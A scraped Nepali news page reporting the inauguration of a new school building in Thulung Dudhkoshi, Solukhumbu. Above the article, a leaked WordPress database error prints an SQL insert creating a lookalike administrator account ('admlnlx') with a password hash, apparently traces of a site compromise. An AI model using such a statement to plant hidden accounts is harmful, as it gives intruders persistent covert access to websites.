WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLaHnQOu9S42tC3SYNryx0MXYp/Wfn0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:41:06', '', 'admlnlx', 'admlnlx')

नाम्से आविको नया भवनको उद्घाटन सम्पन्न – Gaule Khabar

नाम्से आविको नया भवनको उद्घाटन सम्पन्न

नाम्से आविको नया भवनको उद्घाटन सम्पन्न

सोलुखुम्बु । थुलुङ दुधकोशी ७ स्थित नाम्से आविको सुविधा सम्पन्न विद्यालय भवनको उद्घाटन सम्पन्न भएको छ ।
थुलुङ दुधकोशी गाउँपालिकाको लगानिमा स्वर्णिम टोल विकास संस्थाले निर्माण गरेको ५ कोठे भवनको आज बुधबार एक कार्यक्रमका बीच थुलुङ दुधकोशी गाउँपालिका अध्यक्ष अशिम राईले उद्घाटन गर्नुभएको हो ।
भवन उद्घाटन समारोहलाई सम्बोधन गर्दै अध्यक्ष असिम राईले थुलुङ दुध्कोशी शैक्षिक गुणस्तर अभिबृद्दिमा जिल्ला कै नमुना रहेको दाबी गरे । आफ्नो पालिकाले कुल बजेटको २५ प्रतिशत रकम शिक्षामा छुट्याएको स्मरण गराउदै अध्यक्ष राईले शिक्षामा गरिएको लगानी कहिल्यै खेर नजाने जिकिर गरे ।

कार्यक्रममा वडा न ७ का वडाध्यक्ष तथा गाउँपालिका प्रबक्ता भोजराज कार्कीले पालिकासगको उच्च समन्वय र पालिका नेतृत्वको उदारवादी सोचका कारण नाम्से अविले नयाँ भवन प्राप्त गरेको बताए ।

विब्यस अध्यक्ष बुद्धिराम नेपालीको अध्यक्षता तथा गाउँपालिका अध्यक्ष असिम राईको प्रमुख अतिथ्यतामा भएको उक्त कार्यक्रममा नेकपा माओवादी केन्द्र कोशी प्रदेश सदस्य तथा थुलुङ दुधकोशीका इन्चार्ज घनश्याम नेपाली, पार्टीका पालिका अध्यक्ष रामसङ्घर्ष किराँती, अभिभावक, स्थानीय, शिक्षक, विद्यार्थी लगायतको उपस्थिति थियोे ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका